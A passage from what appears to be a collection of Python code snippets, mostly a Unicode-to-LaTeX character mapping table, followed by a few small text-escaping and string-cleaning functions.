LETTER O WITH ACUTE}', u\"\\\\'O\")\n self.register(u'\\N{LATIN CAPITAL LETTER O WITH CIRCUMFLEX}', u'\\\\^O')\n self.register(u'\\N{LATIN CAPITAL LETTER O WITH TILDE}', u'\\\\~O')\n self.register(u'\\N{LATIN CAPITAL LETTER O WITH DIAERESIS}', u'\\\\\"O')\n self.register(u'\\N{MULTIPLICATION SIGN}', u'\\\\times', mode='math')\n self.register(u'\\N{LATIN CAPITAL LETTER O WITH STROKE}', u'\\\\O')\n self.register(u'\\N{LATIN CAPITAL LETTER U WITH GRAVE}', u'\\\\`U')\n self.register(u'\\N{LATIN CAPITAL LETTER U WITH ACUTE}', u\"\\\\'U\")\n self.register(u'\\N{LATIN CAPITAL LETTER U WITH CIRCUMFLEX}', u'\\\\^U')\n self.register(u'\\N{LATIN CAPITAL LETTER U WITH DIAERESIS}', u'\\\\\"U')\n self.register(u'\\N{LATIN CAPITAL LETTER Y WITH ACUTE}', u\"\\\\'Y\")\n self.register(u'\\N{LATIN SMALL LETTER SHARP S}', u'\\\\ss')\n self.register(u'\\N{LATIN SMALL LETTER A WITH GRAVE}', u'\\\\`a')\n self.register(u'\\N{LATIN SMALL LETTER A WITH ACUTE}', u\"\\\\'a\")\n self.register(u'\\N{LATIN SMALL LETTER A WITH CIRCUMFLEX}', u'\\\\^a')\n self.register(u'\\N{LATIN SMALL LETTER A WITH TILDE}', u'\\\\~a')\n self.register(u'\\N{LATIN SMALL LETTER A WITH DIAERESIS}', u'\\\\\"a')\n self.register(u'\\N{LATIN SMALL LETTER A WITH RING ABOVE}', u'\\\\aa')\n self.register(u'\\N{LATIN SMALL LETTER A WITH RING ABOVE}', u'\\\\r a',\n encode=False)\n self.register(u'\\N{LATIN SMALL LETTER AE}', u'\\\\ae')\n self.register(u'\\N{LATIN SMALL LETTER C WITH CEDILLA}', u'\\\\c c')\n self.register(u'\\N{LATIN SMALL LETTER E WITH GRAVE}', u'\\\\`e')\n self.register(u'\\N{LATIN SMALL LETTER E WITH ACUTE}', u\"\\\\'e\")\n self.register(u'\\N{LATIN SMALL LETTER E WITH CIRCUMFLEX}', u'\\\\^e')\n self.register(u'\\N{LATIN SMALL LETTER E WITH DIAERESIS}', u'\\\\\"e')\n self.register(u'\\N{LATIN SMALL LETTER I WITH GRAVE}', u'\\\\`\\\\i')\n self.register(u'\\N{LATIN SMALL LETTER I WITH GRAVE}', u'\\\\`i')\n self.register(u'\\N{LATIN SMALL LETTER I WITH ACUTE}', u\"\\\\'\\\\i\")\n self.register(u'\\N{LATIN SMALL LETTER I WITH ACUTE}', u\"\\\\'i\")\n self.register(u'\\N{LATIN SMALL LETTER I WITH CIRCUMFLEX}', u'\\\\^\\\\i')\n self.register(u'\\N{LATIN SMALL LETTER I WITH CIRCUMFLEX}', u'\\\\^i')\n self.register(u'\\N{LATIN SMALL LETTER I WITH DIAERESIS}', u'\\\\\"\\\\i')\n self.register(u'\\N{LATIN SMALL LETTER I WITH DIAERESIS}', u'\\\\\"i')\n self.register(u'\\N{LATIN SMALL LETTER N WITH TILDE}', u'\\\\~n')\n self.register(u'\\N{LATIN SMALL LETTER O WITH GRAVE}', u'\\\\`o')\n self.register(u'\\N{LATIN SMALL LETTER O WITH ACUTE}', u\"\\\\'o\")\n self.register(u'\\N{LATIN SMALL LETTER O WITH CIRCUMFLEX}', u'\\\\^o')\n self.register(u'\\N{LATIN SMALL LETTER O WITH TILDE}', u'\\\\~o')\n self.register(u'\\N{LATIN SMALL LETTER O WITH DIAERESIS}', u'\\\\\"o')\n self.register(u'\\N{DIVISION SIGN}', u'\\\\div', mode='math')\n self.register(u'\\N{LATIN SMALL LETTER O WITH STROKE}', u'\\\\o')\n self.register(u'\\N{LATIN SMALL LETTER U WITH GRAVE}', u'\\\\`u')\n self.register(u'\\N{LATIN SMALL LETTER U WITH ACUTE}', u\"\\\\'u\")\n self.register(u'\\N{LATIN SMALL LETTER U WITH CIRCUMFLEX}', u'\\\\^u')\n self.register(u'\\N{LATIN SMALL LETTER U WITH DIAERESIS}', u'\\\\\"u')\n self.register(u'\\N{LATIN SMALL LETTER Y WITH ACUTE}', u\"\\\\'y\")\n self.register(u'\\N{LATIN SMALL LETTER Y WITH DIAERESIS}', u'\\\\\"y')\n self.register(u'\\N{LATIN CAPITAL LETTER A WITH MACRON}', u'\\\\=A')\n self.register(u'\\N{LATIN SMALL LETTER A WITH MACRON}', u'\\\\=a')\n self.register(u'\\N{LATIN CAPITAL LETTER A WITH BREVE}', u'\\\\u A')\n self.register(u'\\N{LATIN SMALL LETTER A WITH BREVE}', u'\\\\u a')\n self.register(u'\\N{LATIN CAPITAL LETTER A WITH OGONEK}', u'\\\\k A')\n self.register(u'\\N{LATIN SMALL LETTER A WITH OGONEK}', u'\\\\k a')\n self.register(u'\\N{LATIN CAPITAL LETTER C WITH ACUTE}', u\"\\\\'C\")\n self.register(u'\\N{LATIN SMALL LETTER C WITH ACUTE}', u\"\\\\'c\")\n self.register(u'\\N{LATIN CAPITAL LETTER C WITH CIRCUMFLEX}', u'\\\\^C')\n self.register(u'\\N{LATIN SMALL LETTER C WITH CIRCUMFLEX}', u'\\\\^c')\n self.register(u'\\N{LATIN CAPITAL LETTER C WITH DOT ABOVE}', u'\\\\.C')\n self.register(u'\\N{LATIN SMALL LETTER C WITH DOT ABOVE}', u'\\\\.c')\n self.register(u'\\N{LATIN CAPITAL LETTER C WITH CARON}', u'\\\\v C')\n self.register(u'\\N{LATIN SMALL LETTER C WITH CARON}', u'\\\\v c')\n self.register(u'\\N{LATIN CAPITAL LETTER D WITH CARON}', u'\\\\v D')\n self.register(u'\\N{LATIN SMALL LETTER D WITH CARON}', u'\\\\v d')\n self.register(u'\\N{LATIN CAPITAL LETTER E WITH MACRON}', u'\\\\=E')\n self.register(u'\\N{LATIN SMALL LETTER E WITH MACRON}', u'\\\\=e')\n self.register(u'\\N{LATIN CAPITAL LETTER E WITH BREVE}', u'\\\\u E')\n self.register(u'\\N{LATIN SMALL LETTER E WITH BREVE}', u'\\\\u e')\n self.register(u'\\N{LATIN CAPITAL LETTER E WITH DOT ABOVE}', u'\\\\.E')\n self.register(u'\\N{LATIN SMALL LETTER E WITH DOT ABOVE}', u'\\\\.e')\n self.register(u'\\N{LATIN CAPITAL LETTER E WITH OGONEK}', u'\\\\k E')\n self.register(u'\\N{LATIN SMALL LETTER E WITH OGONEK}', u'\\\\k e')\n self.register(u'\\N{LATIN CAPITAL LETTER E WITH CARON}', u'\\\\v E')\n self.register(u'\\N{LATIN SMALL LETTER E WITH CARON}', u'\\\\v e')\n self.register(u'\\N{LATIN CAPITAL LETTER G WITH CIRCUMFLEX}', u'\\\\^G')\n self.register(u'\\N{LATIN SMALL LETTER G WITH CIRCUMFLEX}', u'\\\\^g')\n self.register(u'\\N{LATIN CAPITAL LETTER G WITH BREVE}', u'\\\\u G')\n self.register(u'\\N{LATIN SMALL LETTER G WITH BREVE}', u'\\\\u g')\n self.register(u'\\N{LATIN CAPITAL LETTER G WITH DOT ABOVE}', u'\\\\.G')\n self.register(u'\\N{LATIN SMALL LETTER G WITH DOT ABOVE}', u'\\\\.g')\n self.register(u'\\N{LATIN CAPITAL LETTER G WITH CEDILLA}', u'\\\\c G')\n self.register(u'\\N{LATIN SMALL LETTER G WITH CEDILLA}', u'\\\\c g')\n self.register(u'\\N{LATIN CAPITAL LETTER H WITH CIRCUMFLEX}', u'\\\\^H')\n self.register(u'\\N{LATIN SMALL LETTER H WITH CIRCUMFLEX}', u'\\\\^h')\n self.register(u'\\N{LATIN CAPITAL LETTER I WITH TILDE}', u'\\\\~I')\n self.register(u'\\N{LATIN SMALL LETTER I WITH TILDE}', u'\\\\~\\\\i')\n self.register(u'\\N{LATIN SMALL LETTER I WITH TILDE}', u'\\\\~i')\n self.register(u'\\N{LATIN CAPITAL LETTER I WITH MACRON}', u'\\\\=I')\n self.register(u'\\N{LATIN SMALL LETTER I WITH MACRON}', u'\\\\=\\\\i')\n self.register(u'\\N{LATIN SMALL LETTER I WITH MACRON}', u'\\\\=i')\n self.register(u'\\N{LATIN CAPITAL LETTER I WITH BREVE}', u'\\\\u I')\n self.register(u'\\N{LATIN SMALL LETTER I WITH BREVE}', u'\\\\u\\\\i')\n self.register(u'\\N{LATIN SMALL LETTER I WITH BREVE}', u'\\\\u i')\n self.register(u'\\N{LATIN CAPITAL LETTER I WITH OGONEK}', u'\\\\k I')\n self.register(u'\\N{LATIN SMALL LETTER I WITH OGONEK}', u'\\\\k i')\n self.register(u'\\N{LATIN CAPITAL LETTER I WITH DOT ABOVE}', u'\\\\.I')\n self.register(u'\\N{LATIN SMALL LETTER DOTLESS I}', u'\\\\i')\n self.register(u'\\N{LATIN CAPITAL LIGATURE IJ}', u'IJ', decode=False)\n self.register(u'\\N{LATIN SMALL LIGATURE IJ}', u'ij', decode=False)\n self.register(u'\\N{LATIN CAPITAL LETTER J WITH CIRCUMFLEX}', u'\\\\^J')\n self.register(u'\\N{LATIN SMALL LETTER J WITH CIRCUMFLEX}', u'\\\\^\\\\j')\n self.register(u'\\N{LATIN SMALL LETTER J WITH CIRCUMFLEX}', u'\\\\^j')\n self.register(u'\\N{LATIN CAPITAL LETTER K WITH CEDILLA}', u'\\\\c K')\n self.register(u'\\N{LATIN SMALL LETTER K WITH CEDILLA}', u'\\\\c k')\n self.register(u'\\N{LATIN CAPITAL LETTER L WITH ACUTE}', u\"\\\\'L\")\n self.register(u'\\N{LATIN SMALL LETTER L WITH ACUTE}', u\"\\\\'l\")\n self.register(u'\\N{LATIN CAPITAL LETTER L WITH CEDILLA}', u'\\\\c L')\n self.register(u'\\N{LATIN SMALL LETTER L WITH CEDILLA}', u'\\\\c l')\n self.register(u'\\N{LATIN CAPITAL LETTER L WITH CARON}', u'\\\\v L')\n self.register(u'\\N{LATIN SMALL LETTER L WITH CARON}', u'\\\\v l')\n self.register(u'\\N{LATIN CAPITAL LETTER L WITH STROKE}', u'\\\\L')\n self.register(u'\\N{LATIN SMALL LETTER L WITH STROKE}', u'\\\\l')\n self.register(u'\\N{LATIN CAPITAL LETTER N WITH ACUTE}', u\"\\\\'N\")\n self.register(u'\\N{LATIN SMALL LETTER N WITH ACUTE}', u\"\\\\'n\")\n self.register(u'\\N{LATIN CAPITAL LETTER N WITH CEDILLA}', u'\\\\c N')\n self.register(u'\\N{LATIN SMALL LETTER N WITH CEDILLA}', u'\\\\c n')\n self.register(u'\\N{LATIN CAPITAL LETTER N WITH CARON}', u'\\\\v N')\n self.register(u'\\N{LATIN SMALL LETTER N WITH CARON}', u'\\\\v n')\n self.register(u'\\N{LATIN CAPITAL LETTER O WITH MACRON}', u'\\\\=O')\n self.register(u'\\N{LATIN SMALL LETTER O WITH MACRON}', u'\\\\=o')\n self.register(u'\\N{LATIN CAPITAL LETTER O WITH BREVE}', u'\\\\u O')\n self.register(u'\\N{LATIN SMALL LETTER O WITH BREVE}', u'\\\\u o')\n self.register(\n u'\\N{LATIN CAPITAL LETTER O WITH DOUBLE ACUTE}',\n u'\\\\H O')\n self.register(u'\\N{LATIN SMALL LETTER O WITH DOUBLE ACUTE}', u'\\\\H o')\n self.register(u'\\N{LATIN CAPITAL LIGATURE OE}', u'\\\\OE')\n self.register(u'\\N{LATIN SMALL LIGATURE OE}', u'\\\\oe')\n self.register(u'\\N{LATIN CAPITAL LETTER R WITH ACUTE}', u\"\\\\'R\")\n self.register(u'\\N{LATIN SMALL LETTER R WITH ACUTE}', u\"\\\\'r\")\n self.register(u'\\N{LATIN CAPITAL LETTER R WITH CEDILLA}', u'\\\\c R')\n self.register(u'\\N{LATIN SMALL LETTER R WITH CEDILLA}', u'\\\\c r')\n self.register(u'\\N{LATIN CAPITAL LETTER R WITH CARON}', u'\\\\v R')\n self.register(u'\\N{LATIN SMALL LETTER R WITH CARON}', u'\\\\v r')\n self.register(u'\\N{LATIN CAPITAL LETTER S WITH ACUTE}', u\"\\\\'S\")\n self.register(u'\\N{LATIN SMALL LETTER S WITH ACUTE}', u\"\\\\'s\")\n self.register(u'\\N{LATIN CAPITAL LETTER S WITH CIRCUMFLEX}', u'\\\\^S')\n self.register(u'\\N{LATIN SMALL LETTER S WITH CIRCUMFLEX}', u'\\\\^s')\n self.register(u'\\N{LATIN CAPITAL LETTER S WITH CEDILLA}', u'\\\\c S')\n self.register(u'\\N{LATIN SMALL LETTER S WITH CEDILLA}', u'\\\\c s')\n self.register(u'\\N{LATIN CAPITAL LETTER S WITH CARON}', u'\\\\v S')\n self.register(u'\\N{LATIN SMALL LETTER S WITH CARON}', u'\\\\v s')\n self.register(u'\\N{LATIN CAPITAL LETTER T WITH CEDILLA}', u'\\\\c T')\n self.register(u'\\N{LATIN SMALL LETTER T WITH CEDILLA}', u'\\\\c t')\n self.register(u'\\N{LATIN CAPITAL LETTER T WITH CARON}', u'\\\\v T')\n self.register(u'\\N{LATIN SMALL LETTER T WITH CARON}', u'\\\\v t')\n self.register(u'\\N{LATIN CAPITAL LETTER U WITH TILDE}', u'\\\\~U')\n self.register(u'\\N{LATIN SMALL LETTER U WITH TILDE}', u'\\\\~u')\n self.register(u'\\N{LATIN CAPITAL LETTER U WITH MACRON}', u'\\\\=U')\n self.register(u'\\N{LATIN SMALL LETTER U WITH MACRON}', u'\\\\=u')\n self.register(u'\\N{LATIN CAPITAL LETTER U WITH BREVE}', u'\\\\u U')\n self.register(u'\\N{LATIN SMALL LETTER U WITH BREVE}', u'\\\\u u')\n self.register(u'\\N{LATIN CAPITAL LETTER U WITH RING ABOVE}', u'\\\\r U')\n self.register(u'\\N{LATIN SMALL LETTER U WITH RING ABOVE}', u'\\\\r u')\n self.register(\n u'\\N{LATIN CAPITAL LETTER U WITH DOUBLE ACUTE}',\n u'\\\\H U')\n self.register(u'\\N{LATIN SMALL LETTER U WITH DOUBLE ACUTE}', u'\\\\H u')\n self.register(u'\\N{LATIN CAPITAL LETTER U WITH OGONEK}', u'\\\\k U')\n self.register(u'\\N{LATIN SMALL LETTER U WITH OGONEK}', u'\\\\k u')\n self.register(u'\\N{LATIN CAPITAL LETTER W WITH CIRCUMFLEX}', u'\\\\^W')\n self.register(u'\\N{LATIN SMALL LETTER W WITH CIRCUMFLEX}', u'\\\\^w')\n self.register(u'\\N{LATIN CAPITAL LETTER Y WITH CIRCUMFLEX}', u'\\\\^Y')\n self.register(u'\\N{LATIN SMALL LETTER Y WITH CIRCUMFLEX}', u'\\\\^y')\n self.register(u'\\N{LATIN CAPITAL LETTER Y WITH DIAERESIS}', u'\\\\\"Y')\n self.register(u'\\N{LATIN CAPITAL LETTER Z WITH ACUTE}', u\"\\\\'Z\")\n self.register(u'\\N{LATIN SMALL LETTER Z WITH ACUTE}', u\"\\\\'z\")\n self.register(u'\\N{LATIN CAPITAL LETTER Z WITH DOT ABOVE}', u'\\\\.Z')\n self.register(u'\\N{LATIN SMALL LETTER Z WITH DOT ABOVE}', u'\\\\.z')\n self.register(u'\\N{LATIN CAPITAL LETTER Z WITH CARON}', u'\\\\v Z')\n self.register(u'\\N{LATIN SMALL LETTER Z WITH CARON}', u'\\\\v z')\n self.register(u'\\N{LATIN CAPITAL LETTER DZ WITH CARON}', u'D\\\\v Z')\n self.register(\n u'\\N{LATIN CAPITAL LETTER D WITH SMALL LETTER Z WITH CARON}',\n u'D\\\\v z')\n self.register(u'\\N{LATIN SMALL LETTER DZ WITH CARON}', u'd\\\\v z')\n self.register(u'\\N{LATIN CAPITAL LETTER LJ}', u'LJ', decode=False)\n self.register(\n u'\\N{LATIN CAPITAL LETTER L WITH SMALL LETTER J}',\n u'Lj',\n decode=False)\n self.register(u'\\N{LATIN SMALL LETTER LJ}', u'lj', decode=False)\n self.register(u'\\N{LATIN CAPITAL LETTER NJ}', u'NJ', decode=False)\n self.register(\n u'\\N{LATIN CAPITAL LETTER N WITH SMALL LETTER J}',\n u'Nj',\n decode=False)\n self.register(u'\\N{LATIN SMALL LETTER NJ}', u'nj', decode=False)\n self.register(u'\\N{LATIN CAPITAL LETTER A WITH CARON}', u'\\\\v A')\n self.register(u'\\N{LATIN SMALL LETTER A WITH CARON}', u'\\\\v a')\n self.register(u'\\N{LATIN CAPITAL LETTER I WITH CARON}', u'\\\\v I')\n self.register(u'\\N{LATIN SMALL LETTER I WITH CARON}', u'\\\\v\\\\i')\n self.register(u'\\N{LATIN CAPITAL LETTER O WITH CARON}', u'\\\\v O')\n self.register(u'\\N{LATIN SMALL LETTER O WITH CARON}', u'\\\\v o')\n self.register(u'\\N{LATIN CAPITAL LETTER U WITH CARON}', u'\\\\v U')\n self.register(u'\\N{LATIN SMALL LETTER U WITH CARON}', u'\\\\v u')\n self.register(u'\\N{LATIN CAPITAL LETTER G WITH CARON}', u'\\\\v G')\n self.register(u'\\N{LATIN SMALL LETTER G WITH CARON}', u'\\\\v g')\n self.register(u'\\N{LATIN CAPITAL LETTER K WITH CARON}', u'\\\\v K')\n self.register(u'\\N{LATIN SMALL LETTER K WITH CARON}', u'\\\\v k')\n self.register(u'\\N{LATIN CAPITAL LETTER O WITH OGONEK}', u'\\\\k O')\n self.register(u'\\N{LATIN SMALL LETTER O WITH OGONEK}', u'\\\\k o')\n self.register(u'\\N{LATIN SMALL LETTER J WITH CARON}', u'\\\\v\\\\j')\n self.register(u'\\N{LATIN CAPITAL LETTER DZ}', u'DZ', decode=False)\n self.register(\n u'\\N{LATIN CAPITAL LETTER D WITH SMALL LETTER Z}',\n u'Dz',\n decode=False)\n self.register(u'\\N{LATIN SMALL LETTER DZ}', u'dz', decode=False)\n self.register(u'\\N{LATIN CAPITAL LETTER G WITH ACUTE}', u\"\\\\'G\")\n self.register(u'\\N{LATIN SMALL LETTER G WITH ACUTE}', u\"\\\\'g\")\n self.register(u'\\N{LATIN CAPITAL LETTER AE WITH ACUTE}', u\"\\\\'\\\\AE\")\n self.register(u'\\N{LATIN SMALL LETTER AE WITH ACUTE}', u\"\\\\'\\\\ae\")\n self.register(\n u'\\N{LATIN CAPITAL LETTER O WITH STROKE AND ACUTE}',\n u\"\\\\'\\\\O\")\n self.register(\n u'\\N{LATIN SMALL LETTER O WITH STROKE AND ACUTE}',\n u\"\\\\'\\\\o\")\n self.register(u'\\N{LATIN CAPITAL LETTER ETH}', u'\\\\DH')\n self.register(u'\\N{LATIN SMALL LETTER ETH}', u'\\\\dh')\n self.register(u'\\N{LATIN CAPITAL LETTER THORN}', u'\\\\TH')\n self.register(u'\\N{LATIN SMALL LETTER THORN}', u'\\\\th')\n self.register(u'\\N{LATIN CAPITAL LETTER D WITH STROKE}', u'\\\\DJ')\n self.register(u'\\N{LATIN SMALL LETTER D WITH STROKE}', u'\\\\dj')\n self.register(u'\\N{LATIN CAPITAL LETTER D WITH DOT BELOW}', u'\\\\d D')\n self.register(u'\\N{LATIN SMALL LETTER D WITH DOT BELOW}', u'\\\\d d')\n self.register(u'\\N{LATIN CAPITAL LETTER L WITH DOT BELOW}', u'\\\\d L')\n self.register(u'\\N{LATIN SMALL LETTER L WITH DOT BELOW}', u'\\\\d l')\n self.register(u'\\N{LATIN CAPITAL LETTER M WITH DOT BELOW}', u'\\\\d M')\n self.register(u'\\N{LATIN SMALL LETTER M WITH DOT BELOW}', u'\\\\d m')\n self.register(u'\\N{LATIN CAPITAL LETTER N WITH DOT BELOW}', u'\\\\d N')\n self.register(u'\\N{LATIN SMALL LETTER N WITH DOT BELOW}', u'\\\\d n')\n self.register(u'\\N{LATIN CAPITAL LETTER R WITH DOT BELOW}', u'\\\\d R')\n self.register(u'\\N{LATIN SMALL LETTER R WITH DOT BELOW}', u'\\\\d r')\n self.register(u'\\N{LATIN CAPITAL LETTER S WITH DOT BELOW}', u'\\\\d S')\n self.register(u'\\N{LATIN SMALL LETTER S WITH DOT BELOW}', u'\\\\d s')\n self.register(u'\\N{LATIN CAPITAL LETTER T WITH DOT BELOW}', u'\\\\d T')\n self.register(u'\\N{LATIN SMALL LETTER T WITH DOT BELOW}', u'\\\\d t')\n self.register(u'\\N{LATIN CAPITAL LETTER S WITH COMMA BELOW}',\n u'\\\\textcommabelow S')\n self.register(u'\\N{LATIN SMALL LETTER S WITH COMMA BELOW}',\n u'\\\\textcommabelow s')\n self.register(u'\\N{LATIN CAPITAL LETTER T WITH COMMA BELOW}',\n u'\\\\textcommabelow T')\n self.register(u'\\N{LATIN SMALL LETTER T WITH COMMA BELOW}',\n u'\\\\textcommabelow t')\n self.register(u'\\N{PARTIAL DIFFERENTIAL}', u'\\\\partial', mode='math')\n self.register(u'\\N{N-ARY PRODUCT}', u'\\\\prod', mode='math')\n self.register(u'\\N{N-ARY SUMMATION}', u'\\\\sum', mode='math')\n self.register(u'\\N{SQUARE ROOT}', u'\\\\surd', mode='math')\n self.register(u'\\N{INFINITY}', u'\\\\infty', mode='math')\n self.register(u'\\N{INTEGRAL}', u'\\\\int', mode='math')\n self.register(u'\\N{INTERSECTION}', u'\\\\cap', mode='math')\n self.register(u'\\N{UNION}', u'\\\\cup', mode='math')\n self.register(u'\\N{RIGHTWARDS ARROW}', u'\\\\rightarrow', mode='math')\n self.register(\n u'\\N{RIGHTWARDS DOUBLE ARROW}',\n u'\\\\Rightarrow',\n mode='math')\n self.register(u'\\N{LEFTWARDS ARROW}', u'\\\\leftarrow', mode='math')\n self.register(\n u'\\N{LEFTWARDS DOUBLE ARROW}',\n u'\\\\Leftarrow',\n mode='math')\n self.register(u'\\N{LOGICAL OR}', u'\\\\vee', mode='math')\n self.register(u'\\N{LOGICAL AND}', u'\\\\wedge', mode='math')\n self.register(u'\\N{ALMOST EQUAL TO}', u'\\\\approx', mode='math')\n self.register(u'\\N{NOT EQUAL TO}', u'\\\\neq', mode='math')\n self.register(u'\\N{LESS-THAN OR EQUAL TO}', u'\\\\leq', mode='math')\n self.register(u'\\N{GREATER-THAN OR EQUAL TO}', u'\\\\geq', mode='math')\n self.register(u'\\N{MODIFIER LETTER CIRCUMFLEX ACCENT}', u'\\\\^{}')\n self.register(u'\\N{CARON}', u'\\\\v{}')\n self.register(u'\\N{BREVE}', u'\\\\u{}')\n self.register(u'\\N{DOT ABOVE}', u'\\\\.{}')\n self.register(u'\\N{RING ABOVE}', u'\\\\r{}')\n self.register(u'\\N{OGONEK}', u'\\\\k{}')\n self.register(u'\\N{DOUBLE ACUTE ACCENT}', u'\\\\H{}')\n self.register(u'\\N{LATIN SMALL LIGATURE FI}', u'fi', decode=False)\n self.register(u'\\N{LATIN SMALL LIGATURE FL}', u'fl', decode=False)\n self.register(u'\\N{LATIN SMALL LIGATURE FF}', u'ff', decode=False)\n\n self.register(u'\\N{GREEK SMALL LETTER ALPHA}', u'\\\\alpha', mode='math')\n self.register(u'\\N{GREEK SMALL LETTER BETA}', u'\\\\beta', mode='math')\n self.register(u'\\N{GREEK SMALL LETTER GAMMA}', u'\\\\gamma', mode='math')\n self.register(u'\\N{GREEK SMALL LETTER DELTA}', u'\\\\delta', mode='math')\n self.register(\n u'\\N{GREEK SMALL LETTER EPSILON}',\n u'\\\\epsilon',\n mode='math')\n self.register(u'\\N{GREEK SMALL LETTER ZETA}', u'\\\\zeta', mode='math')\n self.register(u'\\N{GREEK SMALL LETTER ETA}', u'\\\\eta', mode='math')\n self.register(u'\\N{GREEK SMALL LETTER THETA}', u'\\\\theta', mode='math')\n self.register(u'\\N{GREEK SMALL LETTER THETA}', u'\\\\texttheta',\n package='textgreek', encode=False)\n self.register(u'\\N{GREEK SMALL LETTER IOTA}', u'\\\\iota', mode='math')\n self.register(u'\\N{GREEK SMALL LETTER KAPPA}', u'\\\\kappa', mode='math')\n self.register(\n u'\\N{GREEK SMALL LETTER LAMDA}',\n u'\\\\lambda',\n mode='math') # LAMDA not LAMBDA\n self.register(u'\\N{GREEK SMALL LETTER MU}', u'\\\\mu', mode='math')\n self.register(u'\\N{GREEK SMALL LETTER NU}', u'\\\\nu', mode='math')\n self.register(u'\\N{GREEK SMALL LETTER XI}', u'\\\\xi', mode='math')\n self.register(\n u'\\N{GREEK SMALL LETTER OMICRON}',\n u'\\\\omicron',\n mode='math')\n self.register(u'\\N{GREEK SMALL LETTER PI}', u'\\\\pi', mode='math')\n self.register(u'\\N{GREEK SMALL LETTER RHO}', u'\\\\rho', mode='math')\n self.register(u'\\N{GREEK SMALL LETTER SIGMA}', u'\\\\sigma', mode='math')\n self.register(u'\\N{GREEK SMALL LETTER TAU}', u'\\\\tau', mode='math')\n self.register(\n u'\\N{GREEK SMALL LETTER UPSILON}',\n u'\\\\upsilon',\n mode='math')\n self.register(u'\\N{GREEK SMALL LETTER PHI}', u'\\\\phi', mode='math')\n self.register(u'\\N{GREEK PHI SYMBOL}', u'\\\\varphi', mode='math')\n self.register(u'\\N{GREEK SMALL LETTER CHI}', u'\\\\chi', mode='math')\n self.register(u'\\N{GREEK SMALL LETTER PSI}', u'\\\\psi', mode='math')\n self.register(u'\\N{GREEK SMALL LETTER OMEGA}', u'\\\\omega', mode='math')\n self.register(\n u'\\N{GREEK CAPITAL LETTER ALPHA}',\n u'\\\\Alpha',\n mode='math')\n self.register(u'\\N{GREEK CAPITAL LETTER BETA}', u'\\\\Beta', mode='math')\n self.register(\n u'\\N{GREEK CAPITAL LETTER GAMMA}',\n u'\\\\Gamma',\n mode='math')\n self.register(\n u'\\N{GREEK CAPITAL LETTER DELTA}',\n u'\\\\Delta',\n mode='math')\n self.register(\n u'\\N{GREEK CAPITAL LETTER EPSILON}',\n u'\\\\Epsilon',\n mode='math')\n self.register(u'\\N{GREEK CAPITAL LETTER ZETA}', u'\\\\Zeta', mode='math')\n self.register(u'\\N{GREEK CAPITAL LETTER ETA}', u'\\\\Eta', mode='math')\n self.register(\n u'\\N{GREEK CAPITAL LETTER THETA}',\n u'\\\\Theta',\n mode='math')\n self.register(u'\\N{GREEK CAPITAL LETTER IOTA}', u'\\\\Iota', mode='math')\n self.register(\n u'\\N{GREEK CAPITAL LETTER KAPPA}',\n u'\\\\Kappa',\n mode='math')\n self.register(\n u'\\N{GREEK CAPITAL LETTER LAMDA}',\n u'\\\\Lambda',\n mode='math') # LAMDA not LAMBDA\n self.register(u'\\N{GREEK CAPITAL LETTER MU}', u'\\\\Mu', mode='math')\n self.register(u'\\N{GREEK CAPITAL LETTER NU}', u'\\\\Nu', mode='math')\n self.register(u'\\N{GREEK CAPITAL LETTER XI}', u'\\\\Xi', mode='math')\n self.register(\n u'\\N{GREEK CAPITAL LETTER OMICRON}',\n u'\\\\Omicron',\n mode='math')\n self.register(u'\\N{GREEK CAPITAL LETTER PI}', u'\\\\Pi', mode='math')\n self.register(u'\\N{GREEK CAPITAL LETTER RHO}', u'\\\\Rho', mode='math')\n self.register(\n u'\\N{GREEK CAPITAL LETTER SIGMA}',\n u'\\\\Sigma',\n mode='math')\n self.register(u'\\N{GREEK CAPITAL LETTER TAU}', u'\\\\Tau', mode='math')\n self.register(\n u'\\N{GREEK CAPITAL LETTER UPSILON}',\n u'\\\\Upsilon',\n mode='math')\n self.register(u'\\N{GREEK CAPITAL LETTER PHI}', u'\\\\Phi', mode='math')\n self.register(u'\\N{GREEK CAPITAL LETTER CHI}', u'\\\\Chi', mode='math')\n self.register(u'\\N{GREEK CAPITAL LETTER PSI}', u'\\\\Psi', mode='math')\n self.register(\n u'\\N{GREEK CAPITAL LETTER OMEGA}',\n u'\\\\Omega',\n mode='math')\n self.register(u'\\N{COPYRIGHT SIGN}', u'\\\\copyright')\n self.register(u'\\N{COPYRIGHT SIGN}', u'\\\\textcopyright')\n self.register(u'\\N{LATIN CAPITAL LETTER A WITH ACUTE}', u\"\\\\'A\")\n self.register(u'\\N{LATIN CAPITAL LETTER I WITH ACUTE}', u\"\\\\'I\")\n self.register(u'\\N{HORIZONTAL ELLIPSIS}', u'\\\\ldots')\n self.register(u'\\N{TRADE MARK SIGN}', u'^{TM}', mode='math')\n self.register(\n u'\\N{TRADE MARK SIGN}',\n u'\\\\texttrademark',\n package='textcomp')\n self.register(\n u'\\N{REGISTERED SIGN}',\n u'\\\\textregistered',\n package='textcomp')\n # \\=O and \\=o will be translated into Ō and ō before we can\n # match the full latex string... so decoding disabled for now\n self.register(u'Ǭ', text_type(r'\\textogonekcentered{\\=O}'),\n decode=False)\n self.register(u'ǭ', text_type(r'\\textogonekcentered{\\=o}'),\n decode=False)\n self.register(u'ℕ', text_type(r'\\mathbb{N}'), mode='math')\n self.register(u'ℕ', text_type(r'\\mathbb N'), mode='math', decode=False)\n self.register(u'ℤ', text_type(r'\\mathbb{Z}'), mode='math')\n self.register(u'ℤ', text_type(r'\\mathbb Z'), mode='math', decode=False)\n self.register(u'ℚ', text_type(r'\\mathbb{Q}'), mode='math')\n self.register(u'ℚ', text_type(r'\\mathbb Q'), mode='math', decode=False)\n self.register(u'ℝ', text_type(r'\\mathbb{R}'), mode='math')\n self.register(u'ℝ', text_type(r'\\mathbb R'), mode='math', decode=False)\n self.register(u'ℂ', text_type(r'\\mathbb{C}'), mode='math')\n self.register(u'ℂ', text_type(r'\\mathbb C'), mode='math', decode=False)",
"def escape(txt):\n txt = sax_escape(txt, entities=ENTITIES)\n return mark_safe(txt)",
"def characters(self, content):\n if self.in_source: self.chars += content",
"def _remove_left_padded_special_chars(self, text: str) -> str:\n pattern = re.compile(\"\\ +[^A-Za-z0-9\\n]\")\n text = re.sub(pattern, \" \", text)\n return text",
"def encodeLiteral(self, string):\r\n return string.replace(\"'\",\"''\")",
"def fix_characters(title):\n return re.sub('[^0-9a-zA-Z]+', ' ', title)",
